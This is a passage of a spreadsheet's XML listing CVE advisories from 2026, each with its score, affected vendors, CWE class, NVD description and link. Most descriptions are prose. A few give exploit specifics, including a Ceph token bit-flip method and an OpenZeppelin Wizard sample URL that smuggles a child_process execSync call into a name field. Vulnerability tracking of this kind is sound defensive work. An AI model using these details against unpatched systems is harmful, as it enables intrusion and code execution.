      <c r="I240" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). A namespace editor can exploit a vulnerability in the spec.database.customExtraParams field, which allows for the injection of dangerous parameters into the MySQL Data Source Name (DSN) string. By manipulating these parameters, an attacker can enable LOCAL INFILE functionality and exfiltrate sensitive files, such as the service account token, from the operator pod. This can lead to privilege escalation, allowing a namespace editor to gain cluster-admin privileges.</t>
        </is>
      </c>
      <c r="M240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18617</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19298</t>
        </is>
      </c>
      <c r="C241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E241" s="5" t="inlineStr"/>
      <c r="F241" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G241" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H241" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I241" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to execute arbitrary code due to an authorization bypass in the flow build process.</t>
        </is>
      </c>
      <c r="M241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19298</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="C242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E242" s="5" t="inlineStr"/>
      <c r="F242" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G242" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="M242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27606</t>
        </is>
      </c>
      <c r="C243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E243" s="5" t="inlineStr"/>
      <c r="F243" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G243" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H243" s="5" t="inlineStr">
        <is>
          <t>rollupjs:rollup</t>
        </is>
      </c>
      <c r="I243" s="5" t="inlineStr">
        <is>
          <t>2026-02-25</t>
        </is>
      </c>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.</t>
        </is>
      </c>
      <c r="M243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27606</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="C244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E244" s="5" t="inlineStr"/>
      <c r="F244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G244" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32590</t>
        </is>
      </c>
      <c r="C245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E245" s="5" t="inlineStr"/>
      <c r="F245" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G245" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H245" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I245" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.</t>
        </is>
      </c>
      <c r="M245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32590</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33001</t>
        </is>
      </c>
      <c r="C246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E246" s="5" t="inlineStr"/>
      <c r="F246" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G246" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H246" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I246" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins.
This can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes.</t>
        </is>
      </c>
      <c r="M246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33001</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39944</t>
        </is>
      </c>
      <c r="C247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E247" s="5" t="inlineStr"/>
      <c r="F247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G247" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the RADOS Gateway (RGW) protects STS session tokens with an AES-128-CBC handler that provides no message authentication, allowing an attacker who holds any valid STS token to tamper with it undetected and escalate to full RGW administrative access. Because the ciphertext is unauthenticated, the attacker can perform a CBC bit-flip on the acct_type, perm_type, and is_admin fields of their own token, and a forged is_admin value triggers a global administrative override that bypasses all capability checks. The attack is reachable remotely over the RGW S3 endpoint and is a self-contained modification of a token the attacker already possesses, requiring no encryption oracle and no network observation. It requires only a single valid STS token, which need not carry any elevated privileges, with STS enabled. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39944</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40858</t>
        </is>
      </c>
      <c r="C248" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E248" s="5" t="inlineStr"/>
      <c r="F248" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G248" s="5" t="inlineStr">
        <is>
          <t>java, apache, jira</t>
        </is>
      </c>
      <c r="H248" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I248" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr">
        <is>
          <t>The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application.
This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.
The JIRA ticket:  https://issues.apache.org/jira/browse/CAMEL-23322  refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.</t>
        </is>
      </c>
      <c r="M248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40858</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="C249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E249" s="5" t="inlineStr"/>
      <c r="F249" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G249" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Control of Generation of Code ('Code Injection'), Improper Control of Dynamically-Managed Code Resources, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Nutch Server  (Nutch REST API).
This issue affects Apache Nutch: from 1.11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249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43112</t>
        </is>
      </c>
      <c r="C250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E250" s="5" t="inlineStr"/>
      <c r="F250" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G250" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H250" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I250" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/smb/client: fix out-of-bounds read in cifs_sanitize_prepath
When cifs_sanitize_prepath is called with an empty string or a string
containing only delimiters (e.g., "/"), the current logic attempts to
check *(cursor2 - 1) before cursor2 has advanced. This results in an
out-of-bounds read.
This patch adds an early exit check after stripping prepended
delimiters. If no path content remains, the function returns NULL.
The bug was identified via manual audit and verified using a
standalone test case compiled with AddressSanitizer, which
triggered a SEGV on affected inputs.</t>
        </is>
      </c>
      <c r="M250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43112</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44829</t>
        </is>
      </c>
      <c r="C251" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E251" s="5" t="inlineStr"/>
      <c r="F251" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G251" s="5" t="inlineStr">
        <is>
          <t>windows, docker</t>
        </is>
      </c>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, filename handling in pkg/modules/api/context.go uses filepath.Base on Linux, which does not treat backslashes as path separators, so a multipart filename containing Windows-style parent directory components survives sanitization. The original filename flows through ctx.diskToOriginal and the multi-output PDF routes into archives.FilesFromDisk and archives.Zip.Archive as the generated zip entry name. A remote attacker can submit a name such as ........\Windows\System32\evil.pdf through an upload or an upstream downloadFrom Content-Disposition header, and a Windows archive extractor can write the resulting file outside the intended extraction directory. The affected paths include /forms/pdfengines/split and other multi-output PDF, LibreOffice, and conversion routes, and exploitation can cause arbitrary file writes on a downstream Windows system when a user or process extracts the returned archive. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44829</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48054</t>
        </is>
      </c>
      <c r="C252" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E252" s="5" t="inlineStr"/>
      <c r="F252" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G252" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>OpenZeppelin Contracts Wizardis a web application to interactively build a contract out of components from OpenZeppelin Contracts. Versions prior to 0.10.9 generate a Hardhat test file (`test/test.ts`) by interpolating user-supplied `opts.name` (ERC20/ERC721) and `opts.uri` (ERC1155) directly into TypeScript string literals at `zip-hardhat.ts:48` and `:50` without any JavaScript string escaping. No authentication is required: an attacker crafts a URL such as `https[:]//wizard[.]openzeppelin[.]com/#/erc20?name=");require("child_process").execSync("...");("` and shares it with a developer. When the victim downloads the resulting zip archive and runs `npx hardhat test`, the injected Node.js code executes with the developer's local OS privileges. Version 0.10.9 fixes the issue.</t>
        </is>
      </c>
      <c r="M252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48054</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49050</t>
        </is>
      </c>
      <c r="C253" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E253" s="5" t="inlineStr"/>
      <c r="F253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G253" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H253" s="5" t="inlineStr">
        <is>
          <t>apache:dolphinscheduler</t>
        </is>
      </c>
      <c r="I253" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>General user can mint admin access tokens via /access-tokens
This issue affects Apache DolphinScheduler: before 3.4.2.
Users are recommended to upgrade to version 3.4.2, which fixes the issue.</t>
        </is>
      </c>
      <c r="M253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49050</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49255</t>
        </is>
      </c>
      <c r="C254" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E254" s="5" t="inlineStr"/>
      <c r="F254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G254" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.11.11, electerm constructs operating system commands in src/app/lib/fs.js by interpolating untrusted file paths into the rmrf(), mv(), and cp() functions. A malicious SSH or SFTP server can provide a filename containing quote characters and shell metacharacters, and a victim can cause that filename to reach the affected operation during remote-to-local transfer, conflict renaming, copying, moving, or removal. The generated `rm -rf`, mv, `cp -r`, PowerShell Remove-Item, Move-Item, or Copy-Item command can then interpret the filename as shell syntax. This allows arbitrary command execution with the electerm desktop user's privileges on POSIX and Windows systems, enabling data exfiltration, file modification, malware installation, or denial of service. This issue is fixed in version 3.11.11.</t>
        </is>
      </c>
      <c r="M254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49255</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49467</t>
        </is>
      </c>
      <c r="C255" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E255" s="5" t="inlineStr"/>
      <c r="F255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G255" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>CWE-303, CWE-304</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr">
        <is>
          <t>Pingvin Share X is a secure and easy self-hosted file sharing platform. A vulnerability in versions 1.5.0 through 1.18.0 allow an attacker to bypass password verification when managing Time-based One-Time Password (TOTP) settings. The root cause is a missing `await` keyword on calls to the asynchronous `verifyPassword` method in `authTotp.service.ts` and the `authenticateUser` method in `auth.service.ts`. In JavaScript, an unawaited `Promise` is always truthy. So the logic intended to throw a `ForbiddenException` when a password is incorrect. It never executes because the expression evaluates the existence of the `Promise` object rather than its resolved boolean result. The vulnerability is fixed in version 1.18.1 by ensuring all asynchronous authentication calls are properly awaited. There are no official workarounds. If a user is locked out, an administrator must manually reset the user's TOTP status in the database.</t>
        </is>
      </c>
      <c r="M255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49467</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50191</t>
        </is>
      </c>
      <c r="C256" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E256" s="5" t="inlineStr"/>
      <c r="F256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G256" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-288</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.8, 4gaBoards is vulnerable to pre-account takeover when registrationEnabled, localRegistrationEnabled, and ssoRegistrationEnabled are enabled and Google, GitHub, Microsoft, or OIDC SSO is configured. The POST /api/register endpoint permits creation of an unverified local account with a victim's email address, and POST /api/access-tokens permits that account to authenticate while isVerified is false. During the victim's first SSO login, server/api/helpers/users/get-create-one-for-github-sso.js, server/api/helpers/users/get-create-one-for-google-sso.js, server/api/helpers/users/get-create-one-for-microsoft-sso.js, and server/api/helpers/users/get-create-one-for-oidc-sso.js find the attacker-controlled account by email and link the verified SSO identity without confirming ownership of the local account. The attacker can retain local-password access to the linked account and obtain the victim's projects, data, and permissions. This issue is fixed in version 3.3.8.</t>
        </is>
      </c>
      <c r="M256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50191</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51974</t>
        </is>
      </c>
      <c r="C257" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E257" s="5" t="inlineStr"/>
      <c r="F257" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G257" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>An eval() injection vulnerability in the get_list function in modules/meta_parser.py in lllyasviel Fooocus 2.1.854 through 2.5.5 allows remote attackers to execute arbitrary Python code via a crafted styles payload in the EXIF metadata of an uploaded image file.</t>
        </is>
      </c>
      <c r="M257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51974</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52691</t>
        </is>
      </c>
      <c r="C258" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E258" s="5" t="inlineStr"/>
      <c r="F258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G258" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Griffin Hive Metastore Module. 
This issue affects Apache Griffin Hive Metastore Module: all versions.
As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52691</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53071</t>
        </is>
      </c>
      <c r="C259" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D259" s="5" t="inlineStr">
        <is>
